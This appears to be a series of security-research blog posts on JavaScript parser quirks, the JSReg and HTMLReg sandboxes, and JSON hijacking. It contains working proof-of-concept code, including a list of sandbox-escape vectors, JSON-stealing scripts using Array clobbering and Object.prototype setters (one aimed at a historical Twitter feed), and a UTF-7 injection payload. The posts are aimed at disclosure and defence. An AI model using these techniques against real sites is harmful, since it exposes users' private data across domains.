Unicode monster is back this time eating chrome

It appears this unicode monster keeps chomping away at JavaScript parsers, this time it’s chrome. There was an excellent post from jack masa about JavaScript comments. In it he describes how chrome allows any character which ends in 2a or 2f \uxx2a+\u002f to be used as a “*” or “/”. Pretty crazy I’m sure you’ll agree but nice.

So I thought maybe Chrome has the same problems as Opera when parsing unicode escapes. Of course it does.


uuuu=alert;\u\u\u\u(1)

Yuk I don’t want backslashes in my variables thanks.

So does it go deeper? Of course it does.


eval("Object.defineProperty(window,'u661',{get:function(){alert(1)}});\\u61");

Here I think the parser moves back a character and outputs the 6 twice.

Tested on 15.0.849.0 dev-m

Decoding non-alphanumeric code with Hackvertor

I saw this post from Thomas Stig Jacobsen. He uses eval to decompile the code, I thought there has to be a better way :) so in literally about 30 minutes I managed to do it after a few tweaks to the JSReg code base. What does non-alphanumeric JavaScript look like?


$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$.__$+$.___+$.$$$_+(![]+"")[$._$_]+(![]+"")[$._$_]+$._$+",\\"+$.$__+$.___+"\\"+$.__$+$.__$+$._$_+$.$_$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$._$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\\"\\"+$.$__+$.___+")"+"\"")())();

Produced by my friend Yosuke Hasegawa using his JJEncode.

How the hell do you decode that Gareth? (I hear you say). Quite easily actually. First off I extend the Hackvertor environment to allow sandboxed code to call the JSReg parser.


parser.extendWindow("$sandbox$", function(code){});

This makes “sandbox” a global function within each tag, I need to do this because I want to listen for any calls to “Function” and instead of eval’ing the results I simply want to return the string generated. To do this I add more code to the “sandbox” function to create an instance of JSReg and execute the code:-


parser.extendWindow("$sandbox$", function(code){
var js = JSReg.create(), result;
js.setDebugObjects({doNotFunctionEval:true,functionCode: function(code) {
code = code.replace("J.F();var $arguments$=J.A(arguments);",'');
result = code;
}});
try {
js.eval(code);
} catch(e){
return e;
}
return result;
});

So as you can see the magic happens in the debug objects of JSReg, I use the “doNotFunctionEval” to listen to Function but not eval the code sent. Then I use another listener to “functionCode” to intercept the results.

The final Hackvertor tag is dead simple:-

(function(){
return sandbox(code);
})();

The final results can be seen here:-
Decode non-alpha please feel free to go whoa now. That’s sandboxed code calling a unsandboxed function, sending a non-alpha string, sandboxing it, listening to the results and returning the decoded code. In the blink of an eye :)

Credits as always to Lever one and Jonas Magazinius for testing JSReg and making this possible.

The JSON specification is now wrong

ES5 has decided for whatever reason to treat \u2028 and \u2029 (line/paragraph separators) as a new line in JavaScript this makes it in-line with regex “\s” character class. The JSON specification (to my knowledge) wasn’t changed. So although it mentions escaping characters within strings it isn’t a requirement. This means we’re left with \u2028 and \u2029 characters that can break entire JSON feeds since the string will contain a new line and the JavaScript parser will bail out.

Another interesting fact is that Crockford’s regex in the JSON specification is also wrong, correct at the time but now wrong =)


text='{"abc":"abc\u2029aa"}';
var my_JSON_object = !(/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test(
text.replace(/"(\\.|[^"\\])*"/g, ''))) &&
eval('(' + text + ')');

This will eval since the test doesn’t account for line/paragraph separators and will raise a syntax error since a new line is encountered.

This is also true of most native JSON parsers in various browsers, for example the following:
eval("("+JSON.stringify({a:'a\u2029a'})+")")

Will bail out because the paragraph separator isn’t escaped.

JSReg down but not out

A few months ago some very talented people called Jonas Magazinius aka @internot_ and Alexey Silin aka @lever_one broke JSReg. Maybe broke is the wrong word obliterated is more accurate. This was very humbling for me, I knew it wasn’t perfect this is why I tried to tempt them to break it by stating it was unbreakable :) and it worked, they did and broke it so much more than I was hoping. I must admit I considered abandoning the project since the root of code was rotten. Over the months after I was slowly rewriting and taking a different approach, today I hit some inspiration and managed to finish off what I had started.

The core of the last version was centred around RegExes, I had to slightly adjust this path and allow a mix of regexes and states. Since I’m a rookie at parsers, I decided to take the approach of tokenizing and rewriting in one step. I read many recommendations that you could tokenize your code first then parse it but I feel it can be done at once.

So the modified loop looks something like this:-

pos = 0;
left = 0;
while(pos < code.length) {
chr = code.substr(pos, 1);
prevText = code.substr(0, pos);
currentText = code.substr(pos);
next = code.substr(pos+1, 1);
prev = code.substr(pos-1, 1);
....
} else if(test(objectIdentifiers, currentText)) {
matchStr = match(objectIdentifiers, currentText);
pos += matchStr.length;
output += rewriteObjectIdentifiers(matchStr);
left = 0;
lastState = 'objectIdentifiers';
....

Instead of using just a String replace I loop char by char and move the position along if the regex matches along with any parsing I do without regexes. This way I can have a nice mixture of them both. I had to revise the regex object detection with it’s own state machine since it’s very difficult to parse especially with IE bugs that Lever_One found. Consider the following regex on IE7 (provided by Lever_one):


/[]/]/,alert(1)

So IE7 seems to continue parsing as a regex when it encounters a blank regex class. Thankfully fixed in IE9 standards.

To fix other bugs I started to track parenthesis and check for curly braces after inside for/if statements etc, this fixed many of the vectors were no curlys confused the state of JSReg. Because I’ve collected a huge amount of vector data thanks to Jonas and Alexey, I created a automated check of previous vectors. If you trying to write something similar to JSReg then the following might help you.


//sandbox vectors by Jonas Magazinius, Alexey Silin and other sla.ckers
var tests = ['/lo\\[/;log($placeholder$);;/lo/;','/lo\\/;log($placeholder$);;/lo/;',
'/[/;lo="]/;log($placeholder$);//";','/lo\\//,/;lo=/;log($placeholder$);//;',
"lo=''/**/;log($placeholder$);//';",'/**/log/**/($placeholder$/**//**/);',
"/lo/+/'//log($placeholder$);//';","/lo='/?log($placeholder$);:''",
"[/lo='/];log($placeholder$+'');","
lo=';log($placeholder$+'')",
";log($placeholder$+'')","1/ /x='/;log($placeholder$+'');",
"1/(/x='/);log($placeholder$+'');","0/0/*lo='*/+log($placeholder$+'')",
"[/lo='/];log($placeholder$+'');",'/[;\nlo="]/&log($placeholder$+"");',
'alert(1===/x/ /1+/**/log($placeholder$)/**/)',"(0)[/[']/+log($placeholder$);+']/']",
'(/[/]/)[/(\/\))\/+log($placeholder$);+"\/"/i]',"[/lo='/];log($placeholder$+'');",
'/\\\\\',"m","/;lo=");log($placeholder$);//";','<>lo="<\/>;log($placeholder$);;""',
'
;log($placeholder$);;lo="";','<{\'_\'} {\'o\'}="\\"/>,log($placeholder$);//"\n\n\'/,log($placeholder$);,"lo/";',
"1/\n/lo='/,log($placeholder$+'')","<È>x=';log($placeholder$+'')","
lo=';log($placeholder$+'')",
";log($placeholder$+'')","1/ /x='/;log($placeholder$+'');",
"1/(/x='/);log($placeholder$+'');", "0/0/*lo='*/+log($placeholder$+'')",
"{}/lo='/,log($placeholder$);//'",'_:/\\[/+log($placeholder$);/i','{}/\[/+log($placeholder$);/i','typeof/\[/+log($placeholder$);/i',
'0?0:/\\[/+log($placeholder$);/i','delete/\\[/+log($placeholder$);/i','void/\\[/+log($placeholder$);/i','with({})/\\[/+log($placeholder$);/i',
'if(1)/\\[/+log($placeholder$);/i','while(1)/\\[/+log($placeholder$);/i','try{/\\[/+log($placeholder$);/i}catch(a){}',
'throw/\\[/+log($placeholder$);/i','(function(){return/\\[/+log($placeholder$);/i})()','do{/\\[/+log($placeholder$);/i}while(1)',
'switch(0){case 0:/\\[/+log($placeholder$);/i}','_:/(]\\[)/+log($placeholder$);//]',"_:/'/+log($placeholder$);/i",
"_:<{'x'}>'+log($placeholder$);//'","_:/{/;log($placeholder$);//","_:/\\(/;log($placeholder$);//","_:/ /+log($placeholder$);//",
'+{}/ /lo="/,log($placeholder$);//"',"/[]/,'lo]/,log($placeholder$);//'",
"/[^]/,'lo]/,log($placeholder$);//'","$='@mozilla.org/js/function';\n$::['log']($placeholder$);","true/'/'+log($placeholder$);+''","this/'/'+log($placeholder$);+''",
"undefined/'/'+log($placeholder$);+''","null/'/'+log($placeholder$);+''","false/'/'+log($placeholder$);+''","Infinity/'/'+log($placeholder$);+''","NaN/'/'+log($placeholder$);+''",
"+{}\n{}/lo='/,log($placeholder$);//'","0?0:{}/log($placeholder$);/i","switch(0){case {}/log($placeholder$);/i:1}",
"+function(){1}/log($placeholder$);/lo","~\n{}/log($placeholder$);/lo","lo:{}/'/,log($placeholder$);//'",
"lo:function x(){1}/'/,log($placeholder$);//'","0\n{}/lo='/,log($placeholder$);//'",
"i=0,i++\n{}/lo='/,log($placeholder$);//'","var È=È/log($placeholder$);/È",
"lo:{}/'/,log($placeholder$)//'","lo:function x(){1}/'/,log($placeholder$)//'",
"0\n{}/lo='/,log($placeholder$)//'","i=0,i++\n{}/lo='/,log($placeholder$)//'",
"(function lo(){1})(1,/'/);log($placeholder$)//'","{}'lo'.replace(/'/,\"\"),log($placeholder$)//'",
"var È=È/log($placeholder$)/È","var lo=0?\nlo:{}/log($placeholder$)/0","~{\nlo1:{lo2:1}/log($placeholder$)/1\n}",
"(\n{lo:1}/log($placeholder$)/1\n)","{lo1:\n{lo2:1}/'/,log($placeholder$)//'\n}",
"[\n{lo:1}/log($placeholder$)/1\n]","1?\n{}/log($placeholder$)/i:0",
"0?0?\nlo:lo:{}/log($placeholder$)/1","0\n{/'lo/,log($placeholder$)//'}",
"while(0)/'/;log($placeholder$)//","if(0)/'/;log($placeholder$)//","for(;0;)/'/;log($placeholder$)//","with(0)/'/;log($placeholder$)//",
"0/function(){}/log($placeholder$)//","1\n~/'lo/+log($placeholder$)//'",
"true\n{}/'lo/+log($placeholder$)//'",
"1?\nfunction lo(){1}/log($placeholder$)/1:1",
"var i=1\ni+++\n{lo:1}/log($placeholder$)/1",
"[\nfunction(lo){}/log($placeholder$)/1\n]",
"(function(){}['constructor'])('log($placeholder$)')()",
"(function(){}/log($placeholder$)/1)",
"1 "1 "[]instanceof{}/log($placeholder$)//",
"[]in{}/log($placeholder$)//",
"var n\n/'lo/+log($placeholder$)//'",
"for (i=0;i<1;i++){\nif(0) continue\n{}/'lo/+log($placeholder$)//'}",
"for (i=0;i<1;i++){\nif(0) break\n{}/'lo/+log($placeholder$)//'\n}",
"x:for (i=0;i<1;i++){\nif(0) continue x\n/'lo/+log($placeholder$)//'\n}",
"x:for (i=0;i<1;i++){\nif(0) break x\n/'lo/+log($placeholder$)//'\n}",
"if(0)0\nelse {}/'lo/,log($placeholder$)//'",
"try{}\ncatch(e){}\nfinally{}/'lo/,log($placeholder$)//'",
"for(;\n{}/log($placeholder$)/1\n;lo)0",
"try{x}\ncatch(lo if(1)/log($placeholder$)/1){}",
//dos vectors
"_:/\[/","_:/'/","_:/(]\\[)/","_:/ / /**/","0/function(){}/","function()[]"
];

That's about it I want to thank Jonas Magazinius and Alexey Silin once again for their great work and you should hire those guys if you have a js sandbox that needs testing.

Think you can break JSReg too? Visit here for the demo:-
JSReg demo

and report any bugs here:-
JSReg bugs

JSON Hijacking

There isn’t a lot of information about JSON hijacking out there at the minute, I will aim to provide a “news update” on the state of publicly known techniques. First off I will give a quick overview of how JSON data can be stolen and explain how JavaScript reads JSON.

JavaScript’s quirky nature

There is a little quirk in how JavaScript reads objects, it is a syntax oversight. When a “{” is first encountered if no other statement appeared before or it does not occur inside another object then the code is treated as a block statement. A block statement is simply a collection of one or more JavaScript statements inside a block of curly braces. Here is an example of a block statement:


{1+1,alert('I am a block statement')}

You might have seen code like the following when related to JSON:

eval('('+JSON_DATA+')');

Notice the beginning and ending parenthesis, this is to force JavaScript to execute the data as an object not a block statement mentioned above. If JavaScript did attempt to execute JSON data without the parenthesis and the JSON data did in fact begin with “{” then a syntax error would occur because the block statement would be invalid. To the eval statement the JSON data would look like this:


{"name":"Gareth"}

Because the “{” begins the data it is in block statement mode and the “name” part is treated as a string literal when the colon is encountered it raises a syntax error because a colon cannot occur after a String unless it’s part of a ternary statement. Hopefully now you’ll see why some code uses eval with enclosing parenthesis, I’d like to mention that using eval directly on JSON data is bad practice, you are far better validating the data first or using the browser’s native JSON objects to read the data but it illustrates my point well for understanding how the JSON data is parsed.

The question is what sort of code would execute a object literal when JSON data is encountered? The most common scenario is when the data is placed inside an array literal, if you remembered from my previous explanation ” When a “{” is first encountered if no other statement appeared before or it does not occur inside another object then the code is treated as a block statement. ” so the following are valid object literal statements:


1,{"I am an object":"Literal"}
~{"I am an object":"Literal"}
1+{"I am an object":"Literal"}
[{"I am an object":"Literal"}]

The last example we’re most interested in because many sites use this form of JSON structure. Notice that no variable is assigned for the array literal and the JSON data is executed directly to obtain its contents, but how would you steal this data cross-domain?

Array constructor clobbering

You now know what sort of JSON structure you’re looking for, in the past in Firefox it was possible to clobber the array constructor [1]. This means we could overwrite the array behaviour before the JSON data was read. Then because we had control over the array we could read the data before it was sent. It looked like this:


function Array() {
for(var i=0;i alert(arguments[i]);//contains each friend object
}
}
//X-DOMAIN JSON
<script src="somesocialnetwork.com/friends"> </script>
//JSON DATA CONTAINS: [{"friend1":"Test1"},{"friend2":"Test2"}]

As you can see this is how the data was stolen, each object was passed to our function via the arguments then you could read the data from an external inclusion of the data. Unfortunately/ fortunately depending on your perspective this was fixed in Firefox by not calling the constructor for array literals. Note that this is a non-standard fix for security sake. Other browsers still implement that functionality. We can still demonstrate the past attack though by using the Array constructor directly so you can see how it worked in the past:


function Array() {
for(var i=0;i for(var j in arguments[i]) {
alert(j+'='+arguments[i][j]);
}
}
}
;Array({"friend1":"Test1"},{"friend2":"Test2"})

Object prototype setters

What works now? Well we can still conduct the same attack using another method, in Firefox this method is now fixed due to my demonstration of a Twitter privacy issue [2][3]. However many other browsers including Chrome, Opera and Safari still allow this attack (They don't consider it a flaw). In order to understand the attack you need to understand how setters work. Setters are called when a object's data is attempted to be modified. If you try the following example in Firefox, Chrome, Opera or Safari you will see how they work:


window.__defineSetter__('x', function() {
alert('x is being assigned!');
});
window.x=1;

The example should alert "x is being assigned!". The __defineSetter__ is a special method that allows you to attach a setter to an object. The first argument is the name of your setter in this case "x" and the second argument is the function you wish to call, the object is taken from whichever object you called the __defineSetter__ method.
Now you know how they work you can now use this technique to steal JSON data by applying it to the Object prototype. The Object prototype is a Object that every other object inherits from in JavaScript, if you create a setter on the name of your target JSON data then you can get the value of the data. This time I'll show you a real world attack on Twitter that was fixed. My original article was called "I Know what your friends did last summer" [4] it was a play on the really bad horror films and the fact you could know who your friends are on twitter and basically what they were doing and where. Joe Walker also discovered this technique separately [5]


<script>
Object.prototype.__defineSetter__('user',function(obj){
for(var i in obj) {
alert(i + '=' + obj[i]);
}
});
</script>
<script defer="defer" src=https://twitter.com/statuses/friends_timeline/>
</script>

The first part of the script uses __defineSetter__ on the object prototype and uses "user" as a property, Twitter used the "user" property to store an object about the user in the JSON data. The script then loops through the object and reads the data about the user which would be name,email, location etc. The second part actually includes the twitter JSON feed.

New attacks

If you have partial control over some of the JSON data it's possible to steal the data by manipulating it using UTF-7. For example if you control the "email" field of the JSON data you could encode it in such a way that when it's included it exposes the rest of the data.


[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw
BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw
BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb
wBiACcAOgAnAGQAbwBuAGU-'}]

You can then include the JSON data using a script tag with the UTF-7 charset which converts the +- encoded string to:

[{'friend':'luke','email':''}];alert(‘May the force be with you’);[{'job':'done'}]

Our email field is being closed and manipulated so we can inject our own JavaScript, this way we could steal the data by using timeouts or function calls on the array data. The user "luoluo" from a comment on my blog provides a good example:


[{'friend':'luke','email':''}, 1].sort(function(x,y) {
for (var o in x) {
alert(o + “:” + x[o]);
}
});
setTimeout(function() {
var x = data[0];
for (var o in x) {
alert(o + “:” + x[o]);
}
}, 100);var data=[{'job':'done'}];

ES5 functionality

If __defineSetter__ is not available there is a standards based alternative that may allow JSON stealing to continue. Using the defineProperty or defineProperties methods of the Object you could conduct a similar attack which varies in syntax only slightly.


Object.defineProperty(window,'x',{set: function() {
alert('x is being assigned!');
}});
window.x=1;

As you can see the syntax is very similar, this time however we use window.Object to call the method and specify the Object we wish to create the setter on in the first argument, the second argument is the name of our property and the third argument takes a object literal to define the setter. This can also be applied to the Object prototype by replacing "window" with Object.prototype thus re-creating the object prototype attack mentioned earlier.


Object.defineProperty(Object.prototype, 'user', {
set:function(obj) {
for(var i in obj) {
alert(i + '=' + obj[i]);
}
}
});

Conclusion

If you are pen testing JSON feeds make sure the web site in question prevents external inclusion of the data via script or even better recommend the site does not expose the data publicly if privacy will be compromised. Twitter solved the information disclosure problem by requiring authentication for its JSON and other feeds consider doing the same if the data has to be exposed.
The flaws mentioned in this article exploit design level bugs in how Object literals & array constructors are handled, some browser vendors do not consider them flaws as such, I have to disagree.
The root of the problem is external script inclusion across domains which unfortunately isn’t going to go away any time soon due to the design of the web, we can lock down features in way that they do not compromise privacy, do we really need setters on the Object prototype? If they are required why not place some restrictions on how they can be applied across domains. I understand the vendor’s point of view, technically they are not flaws they are features and in a perfect world they would be used in the correct way and web sites would generate well formed JSON feeds but this isn’t a perfect world and web developers make assumptions about their data. I recommend vendors follow the developer’s assumptions and prevent these types of attacks by locking down the functionality so it can’t be exploited. Developer assumptions create security holes.

References/Links

[1] Joe Walker http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
[2] Jeremiah Grossman http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html
[3] Mozilla security https://developer.mozilla.org/web-tech/2009/04/29/object-and-array-initializers-should-not-invoke-setters-when-evaluated/
[4] http://www.thespanner.co.uk/2009/01/07/i-know-what-your-friends-did-last-summer/
[5] Joe Walker http://directwebremoting.org/blog/joe/2007/03/06/json_is_not_as_safe_as_people_think_it_is_part_2.html

Opera parser monster eats unicode

Whilst writing my own parser I found weird things in Opera’s JavaScript parser. I was testing what the various browsers allowed with unicode escapes and it turns out Opera seems more lax than others. My discovery began with the following code:


try {eval("\\u0066\\u0061\\u006c\\u0073\\u0065");} catch(e) {alert(e);}

What do you expect the undefined variable to be? It’s a unicode encoded “false” hehe so we can have a variable called “false” if we use unicode escapes on Firefox but what about Opera? Well it’s actually looking for a variable called “false5″. Why? Because the JavaScript parser seems to be off by one when using eval with unicode escapes so it thinks the \u006 is actually \u0065 and thus the “5″ is added onto the string.

Pretty cool, so what else can we do? Well, Opera seems a bit more lax than the other browsers when it comes to unicode escapes, for example this is perfectly legal:

\u=alert,u(1)

Pretty nuts right? You can use an incorrect unicode escape and the backslash gets ignored. Another example:

\u000x=alert;u000x(1)

And finally I leave you with this, you can make \u become uu when inside an eval statement:

window.__defineGetter__("uu",function() { alert(1) });eval("\\u");

DOM sandboxing talk

I did a talk in Leeds about DOM sandboxing with regular expressions, it went ok. I’m not the best speaker to be honest but with a bit more practice I’ll get there. Here are the slides:-

PDF version
Powerpoint slides

Blog fight round two

Thanks Pádraic

So I hope you’ve enjoyed our blog fight between me and Pádraic Brady. I sense a lack of a sense if humour in his last post :( his blanket claims that regex html validation sucks were obviously unjustified. Anyway I was waiting for a cool XSS hole in HTMLReg from him, it never came :( he did raise a valid point about a “clickjacking” threat so I decided to update HTMLReg/CSSReg to enable a site to disable all CSS positioning. Thanks very much Pádraic for reporting this issue!

Disable Positioning

HTMLReg and CSSReg now have the option “disablePositioning” this will stop you from be able to define elements which overlap each other, which is useful in a validation scenario not a iframe sandbox scenario (which HTMLReg was originally intended). It’s quite easy to use:-


HTMLReg.disablePositioning = true;
alert(HTMLReg.parse("<div style=position:absolute;></div>")); // <div></div>

Validate HTML

I didn’t stop there while I had my IDE open, I decided to add a validate HTML option, using the new “DOMParser” feature. As I looked deeper into the feature I wish I hadn’t bothered :( when a invalid XML markup is encountered IE throws exception. FF, Op, Webkit doesn’t. Webkit transforms XML and adds a parsing error node/FF entitiy encodes. Ugh. So anyway hopefully I made a cross browser solution which will prevent any invalid HTML markup. Anyway this is what I came up with that should work on newer browsers and older versions of IE:

StringtoXML = function (text){
	try {
		if(window.DOMParser) {
		  var parser=new DOMParser();
	      var doc=parser.parseFromString(text,'text/xml');
	      var xml = (new XMLSerializer()).serializeToString(doc);
	      xml = xml.replace(/^<\?[^?]+\?>\s*/,'');
	      if(/<parsererror[^>]+>/.test(xml)) {
	    	  return 'Invalid HTML markup';
	      } else {
	    	  return xml;
	      }
		} else if(window.ActiveXObject){
          var doc=new ActiveXObject('Microsoft.XMLDOM');
          doc.async='false';
          doc.loadXML(text);
          if(!doc.xml) {
        	  throw {};
          }
          return doc.xml;
		} else {
			return text;
		}
	} catch(e) {
		return 'Invalid HTML markup';
	}
}

Thanks Paul Stone

An excellent bug was found by Paul Stone as a result of this blog fight :) In Firefox RC4 & latest Chrome he noticed that HTMLReg was allowing invalid CSS markup, as he quite rightly pointed out HTMLReg was checking if cssText contained something in RC4 but it wasn’t passing the check as a result the invalid CSS was being allowed. The fix for this was quite simple and involved removing the style attribute if the cssText check wasn’t passed. This didn’t create a security breach as the invalid CSS was just that invalid and other browsers such as IE didn’t allow this markup to be executed but it was a cool bug since HTMLReg should not allow this invalid string.

The vector looked like this:-

<div style="xxx">test</div>

The fix was simply to do this:-

if(element.getAttribute("style") !== '' && element.getAttribute("style") !== null && element.style.cssText !== '') {
...
} else {
//drop style attribute if it exists
element.style.cssText = null;
element.setAttribute("style","");
element.removeAttribute('style');
}

HTMLReg rocky is waiting

HTMLReg is in the ring waiting for you, please get in your corner and try your luck. I doubt you can win :)

Regex HTML Sanitisation can work

Dear Pádraic Brady,

I have not received any emails with any exploits, I am disappointed I want my HTML regex sanitiser to be broken please. Apparently you can find 2-5 vulnerabilities per solution so please execute XSS in my regex. Thanks! I’ll be very impressed if you do and I will promise to dedicate a blog post to you.

HTML Regex sandbox

Please don’t stop there though :) I have a JavaScript sandbox that you can bypass that uses regular expressions.
JavaScript Regex sandbox

Thanks very much

Kind Regards
Gareth

Hackvertor supports 0Auth

I’ve finally added Twitter 0Auth support in Hackvertor, you can now login via Twitter to save you from remembering yet another set of creds. I plan to use the twitter features to enable realtime sharing of HVURLs and interface, maybe games and challenges too eventually. All points are reset :( but if you login and tell me your previous id I’ll try and restore them as well as any tags you might have created.

Hackvertor 0Auth support!

Why should you use Hackvertor? I’m not forcing you but it can help with finding weird stuff like this in webkit:-
Regex weirdness